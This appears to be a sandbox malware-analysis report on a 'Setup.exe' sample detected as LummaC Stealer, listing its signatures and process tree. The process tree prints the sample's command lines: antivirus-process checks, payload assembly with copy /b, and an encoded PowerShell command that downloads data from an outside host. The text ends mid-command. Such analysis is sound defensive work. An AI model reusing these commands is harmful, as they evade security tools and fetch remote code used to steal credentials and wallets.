Edit tour
Windows
Analysis Report
Setup.exe
Overview
General Information
Detection
LummaC Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- Setup.exe (PID: 7664 cmdline:
"C:\Users\ user\Deskt op\Setup.e xe" MD5: 5EFE766F54925452535EF011161EDD16) - cmd.exe (PID: 7708 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy Ne vertheless Neverthel ess.cmd && Neverthel ess.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7772 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7780 cmdline:
findstr /I "wrsa ops svc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 7820 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7828 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7872 cmdline:
cmd /c md 189943 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - findstr.exe (PID: 7888 cmdline:
findstr /V "Expendit uresReacti onsRioWint erDialRedu cedPricing Software" Dennis MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7908 cmdline:
cmd /c cop y /b ..\Ha ndbook + . .\Attorney s + ..\Cel ebration + ..\Advert + ..\Loop + ..\Obje ctives + . .\Added X MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Attachment.com (PID: 7924 cmdline:
Attachment .com X MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11) - powershell.exe (PID: 7736 cmdline:
powershell -exec byp ass -f "C: \Users\use r\AppData\ Local\Temp \GWXV5ZWRB DHT2N15VSQ M3K80X.ps1 " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WmiPrvSE.exe (PID: 3592 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 8132 cmdline:
powershell -exec byp ass -Enc J AB4AHgAeAB 4AHgAeAB4A HgAeAB4AHg AeAB4AHgAe AB4AHgAeAB 4AHgAeAB4A HgAeAB4AHg AeAB4AHgAe AB4AHgAeAB 4AHgAeAB4A HgAeAB4AHg AeAB4AHgAe AB4AHgAeAB 4AHgAeAB4A HgAeAB4AHg AeAB4AHgAe AB4AHgAeAB 4AHgAeAB4A HgAeAB4AHg AeAB4ACAAP QAgAHsACgA gACAAIAAgA FMAdABhAHI AdAAtAFMAb ABlAGUAcAA gAC0AUwBlA GMAbwBuAGQ AcwAgADMAC gAKACAAIAA gACAAWwBTA HkAcwB0AGU AbQAuAE4AZ QB0AC4AVwB lAGIAUgBlA HEAdQBlAHM AdABdADoAO gBDAHIAZQB hAHQAZQAoA CIAaAB0AHQ AcABzADoAL wAvAHcAdwB 3AC4AMwA2A DAALgBuAGU AdAAiACkAL gBHAGUAdAB SAGUAcwBwA G8AbgBzAGU AKAApAC4AQ wBsAG8AcwB lACgAKQAKA AoAIAAgACA AIABTAHQAY QByAHQALQB TAGwAZQBlA HAAIAAtAFM AZQBjAG8Ab gBkAHMAIAA xAAoACgAgA CAAIAAgAFs AUwB5AHMAd ABlAG0ALgB OAGUAdAAuA FcAZQBiAFI AZQBxAHUAZ QBzAHQAXQA 6ADoAQwByA GUAYQB0AGU AKAAiAGgAd AB0AHAAcwA 6AC8ALwB3A HcAdwAuAGI AYQBpAGQAd QAuAGMAbwB tACIAKQAuA EcAZQB0AFI AZQBzAHAAb wBuAHMAZQA oACkALgBDA GwAbwBzAGU AKAApAAoAC gAgACAAIAA gAFMAdABhA HIAdAAtAFM AbABlAGUAc AAgAC0AUwB lAGMAbwBuA GQAcwAgADE ACgAKACAAI AAgACAAJAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbAAgA D0AIAAiAGg AdAB0AHAAc wA6AC8ALwB rAGwAaQBwA GMAYQB0AGU AcABpAHUAM AAuAHMAaAB vAHAALwBpA G4AdABfAGM AbABwAF8Ac wBoAGEALgB 0AHgAdAAiA AoAIAAgACA AIAAkAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbAAgA D0AIABOAGU AdwAtAE8AY gBqAGUAYwB 0ACAAUwB5A HMAdABlAG0 ALgBOAGUAd AAuAFcAZQB iAEMAbABpA GUAbgB0AAo AIAAgACAAI AAkAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbAAgAD0AI AAkAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbAAuAEQ AbwB3AG4Ab ABvAGEAZAB EAGEAdABhA CgAJABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbAApAAoAC gAgACAAIAA gACQAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAbAB sAGwAbABsA GwAbABsAGw AbABsAGwAb ABsAGwAIAA 9ACAATgBlA HcALQBPAGI AagBlAGMAd AAgAFMAeQB zAHQAZQBtA C4ASQBPAC4 ATQBlAG0Ab wByAHkAUwB 0AHIAZQBhA G0ACgAgACA AIAAgACQAb ABsAGwAbAB sAGwAbABsA